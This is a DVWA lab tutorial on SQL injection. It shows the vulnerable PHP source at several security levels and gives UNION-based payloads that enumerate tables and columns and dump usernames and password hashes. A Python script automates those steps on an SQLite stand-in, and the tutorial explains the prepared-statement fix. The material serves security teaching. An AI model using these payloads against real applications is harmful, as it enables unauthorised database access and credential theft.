1. Overview of the SQL injection principle and process
(1) Principle
The application builds its SQL statement by concatenating the user's input into a string. With a ' the attacker closes the string literal the application opened, appends SQL of their own, and uses # to comment out whatever the application put after the input, so the injected SQL runs as part of the legitimate statement.
(2) Classification
- Character (string) type: the input sits inside quotes
- Numeric type: the input is spliced in unquoted
- Search type: the input sits inside a LIKE '%...%' pattern
(3) General SQL injection procedure
1. Determine whether an injection point exists and whether it is character-type or numeric-type;
2. Work out the number of columns in the SQL query (e.g. with ORDER BY n);
3. Find which columns are echoed back to the page (the display positions);
4. Get the current database name, then the tables in that database;
5. Get the column names of the target table;
6. Dump the data.
2. Working through the DVWA SQL injection module
(1) Low security level
[Source]
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ### no PDO here?? $id is concatenated straight into the query
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
[Injection process]
① Check for an injection point and determine its type
Decide whether the injection is character-type or numeric-type
WAY1 (figure)
WAY2 (figure)
[Many rows are returned here because the WHERE clause is evaluated for every row in turn, and the appended condition '1'='1' is always true, so every row matches]
② Work out the number of columns
③ Find the display positions
1' union select 1,2 #
④ Get the database, the tables, and list the columns
1' union select database(),version() #
The trailing # comments out the closing ' (and the ;) that the application appends after the input
List the tables
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
List the columns
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
(Add and table_schema='dvwa' to this WHERE clause if other databases on the server also have a users table; otherwise their columns are mixed into the result.)
⑤ Dump the values
The MD5 password hashes obtained this way can then be cracked offline
(2) Medium security level
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; # numeric type here: $id is not quoted
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
Approach
- The id cannot be typed in directly ☞ capture the request and modify it ☞ Burp Suite ☞ send to Repeater
Capture the request (figure)
① Check for an injection point and determine its type
② Work out the number of columns
③ Find the display positions
④ Get the database name, table names, and column names
Because mysqli_real_escape_string() backslash-escapes every quote, a quoted literal such as 'dvwa' can no longer be used. The query itself is numeric ($id is not quoted), so the escaping does not stop the injection; when listing tables, either write the database name as a hex literal (0x64767761 for dvwa), which MySQL accepts in place of a string, or simply use database() instead.
WAY1 (figure)
WAY2 (figure)
Get the column names
⑤ Dump the data
(3) High security level
[Source]
A page redirect is added (the id is submitted from a separate page)
[Injection process]
① Determine the type
② Work out the number of columns
③ Find the display positions
④ Get the database, tables, and columns
⑤ Dump the data
(4) Impossible security level
[Source]
The Impossible-level code uses PDO prepared statements: the SQL text and the data are sent separately, so user input can never change the structure of the query, which effectively prevents SQL injection.
In addition, the result is only displayed when the query returns exactly one row.
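The Low and Medium procedures above, together with the Impossible-level fix, as one runnable example added here (this is not DVWA's code and not the author's screenshots). It uses an in-memory SQLite database in place of MySQL, so three things differ and are labelled in the code: the comment marker is "-- " rather than "#", sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, and the quote-free literal used at the Medium level is char(...) (which MySQL also accepts), while mysql_hex_literal() only computes the 0x... form you would send to a real MySQL backend. All function names (make_db, lookup_low, walkthrough, ...) and the sample accounts are assumptions of this example.

```python
import sqlite3

# Constructed sample accounts modelled on a subset of DVWA's defaults (not read from a live DVWA).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),    # md5("password")
    (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e3"),  # md5("abc123")
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),         # md5("charley")
]
COMMENT = " -- "  # SQLite has no '#' comment; '-- ' plays the role '#' plays in the MySQL payloads


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for DVWA's MySQL `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, id_value: str):
    """Low: raw input spliced into a quoted literal -> character-type injection."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_value}';"
    return conn.execute(query).fetchall()


def mysqli_real_escape_string(s: str) -> str:
    """Backslash-escapes the same characters PHP's mysqli_real_escape_string() handles."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def lookup_medium(conn, id_value: str):
    """Medium: input is escaped but spliced in unquoted -> numeric-type injection."""
    query = ("SELECT first_name, last_name FROM users WHERE user_id = "
             f"{mysqli_real_escape_string(id_value)};")
    return conn.execute(query).fetchall()


def lookup_impossible(conn, id_value: str):
    """Impossible (approximating the PDO code): numeric check, bound parameter, exactly one row."""
    if not id_value.isdigit():
        return []
    rows = conn.execute("SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1;",
                        (int(id_value),)).fetchall()
    return rows if len(rows) == 1 else []


def medium_rejects_quoted_payload(conn) -> bool:
    """At Medium the escaped quote turns  1' or '1'='1  into a syntax error."""
    try:
        lookup_medium(conn, "1' or '1'='1")
    except sqlite3.OperationalError:
        return True
    return False


def mysql_hex_literal(s: str) -> str:
    """The quote-free form MySQL accepts in place of 'dvwa': 0x64767761 (not valid as text in SQLite)."""
    return "0x" + s.encode().hex()


def quoteless_literal(s: str) -> str:
    """Quote-free string literal understood by both MySQL and SQLite: char(100,118,119,97) = 'dvwa'."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def count_columns(conn, lookup, prefix: str, max_cols: int = 10) -> int:
    """Step 2: ORDER BY n only succeeds while n <= number of columns in the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            lookup(conn, f"{prefix}order by {n}{COMMENT}")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def union_extract(conn, lookup, prefix: str, select_clause: str):
    """Steps 3-6: send a UNION payload and keep only the rows the UNION contributed."""
    baseline = set(lookup(conn, "1"))
    rows = lookup(conn, f"{prefix}union {select_clause}{COMMENT}")
    return sorted(set(rows) - baseline)


def walkthrough(conn, lookup, prefix: str, lit):
    """Steps 2-6 of the page against one level. `lit` renders a string literal ('...' at Low,
    char(...) at Medium); sqlite_master / pragma_table_info() stand in for
    information_schema.tables / information_schema.columns."""
    cols = count_columns(conn, lookup, prefix)
    tables = union_extract(conn, lookup, prefix,
                           f"select 1, group_concat(name) from sqlite_master where type={lit('table')}")[0][1]
    fields = union_extract(conn, lookup, prefix,
                           f"select 1, group_concat(name) from pragma_table_info({lit('users')})")[0][1]
    creds = union_extract(conn, lookup, prefix, "select user, password from users")
    return {"columns": cols, "tables": tables, "fields": fields, "creds": creds}


if __name__ == "__main__":
    db = make_db()
    print("low, 1' or '1'='1 ->", len(lookup_low(db, "1' or '1'='1")), "rows")
    print("low   :", walkthrough(db, lookup_low, "1' ", lambda s: f"'{s}'"))
    print("medium:", walkthrough(db, lookup_medium, "1 ", quoteless_literal))
    print("impossible, same payload ->", lookup_impossible(db, "1' or '1'='1"))
```

Running it shows the or-true probe returning every row at Low, identical walkthrough results at Low and Medium (the escaping changes nothing once the payload contains no quotes, because the query is numeric), the quoted payload being rejected only at Medium, and the parameterised Impossible lookup returning nothing for the same payload because the data never becomes part of the SQL text.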
3. URL encoding
Payloads can be URL-encoded and decoded with Burp Suite (Decoder, or Ctrl+U on a selection in Repeater). In a GET request the # in particular must be sent as %23: a raw # in a URL starts the fragment, which the browser never sends to the server, so the comment (and anything after it) silently disappears.
4. Summary
(1) Commonly needed URL encodings
Character | URL encoding |
---|---|
' | %27 |
space | %20 |
# | %23 |
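The fragment problem described above, as an added example (not part of the original notes): the DVWA address and the helper names build_url, url_encode and server_sees are assumptions; server_sees models what PHP's $_REQUEST would contain after the browser has dropped the fragment.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Assumed local DVWA address; adjust to your lab.
DVWA_SQLI = "http://127.0.0.1/vulnerabilities/sqli/"


def url_encode(payload: str) -> str:
    """Percent-encode every reserved character, including the ' (%27), space (%20)
    and # (%23) that the payloads on this page rely on."""
    return quote(payload, safe="")


def build_url(payload: str, encode: bool = True) -> str:
    """GET request URL for the DVWA Low form, with or without encoding the id parameter."""
    value = url_encode(payload) if encode else payload
    return f"{DVWA_SQLI}?id={value}&Submit=Submit"


def server_sees(url: str) -> dict:
    """The parameters the server would receive. A raw # starts the URL fragment, which the
    browser keeps to itself, so everything from # onwards never reaches PHP."""
    parts = urlsplit(url)
    return {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}


if __name__ == "__main__":
    payload = "1' union select 1,2 #"
    print("encoded :", build_url(payload), "->", server_sees(build_url(payload)))
    print("raw     :", build_url(payload, encode=False), "->",
          server_sees(build_url(payload, encode=False)))
```

With the raw URL the id value arrives without its # and the Submit parameter is lost entirely, which is why the injection "does nothing" until the payload is encoded.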
(2) Know the information_schema database well (MySQL 5.0 and later)
The information_schema.tables table
Holds one row per table in every database
mysql> describe TABLES;
+-----------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | YES | | NULL | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| TABLE_TYPE | varchar(64) | NO | | | |
| ENGINE | varchar(64) | YES | | NULL | |
| VERSION | bigint(21) unsigned | YES | | NULL | |
| ROW_FORMAT | varchar(10) | YES | | NULL | |
| TABLE_ROWS | bigint(21) unsigned | YES | | NULL | |
| AVG_ROW_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| INDEX_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_FREE | bigint(21) unsigned | YES | | NULL | |
| AUTO_INCREMENT | bigint(21) unsigned | YES | | NULL | |
| CREATE_TIME | datetime | YES | | NULL | |
| UPDATE_TIME | datetime | YES | | NULL | |
| CHECK_TIME | datetime | YES | | NULL | |
| TABLE_COLLATION | varchar(32) | YES | | NULL | |
| CHECKSUM | bigint(21) unsigned | YES | | NULL | |
| CREATE_OPTIONS | varchar(255) | YES | | NULL | |
| TABLE_COMMENT | varchar(80) | NO | | | |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.00 sec)
The information_schema.columns table
Holds one row per column in every table
mysql> describe columns;
+--------------------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | YES | | NULL | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| COLUMN_NAME | varchar(64) | NO | | | |
| ORDINAL_POSITION | bigint(21) unsigned | NO | | 0 | |
| COLUMN_DEFAULT | longtext | YES | | NULL | |
| IS_NULLABLE | varchar(3) | NO | | | |
| DATA_TYPE | varchar(64) | NO | | | |
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_OCTET_LENGTH | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_PRECISION | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_SCALE | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_SET_NAME | varchar(32) | YES | | NULL | |
| COLLATION_NAME | varchar(32) | YES | | NULL | |
| COLUMN_TYPE | longtext | NO | | NULL | |
| COLUMN_KEY | varchar(3) | NO | | | |
| EXTRA | varchar(27) | NO | | | |
| PRIVILEGES | varchar(80) | NO | | | |
| COLUMN_COMMENT | varchar(255) | NO | | | |
+--------------------------+---------------------+------+-----+---------+-------+
19 rows in set (0.00 sec)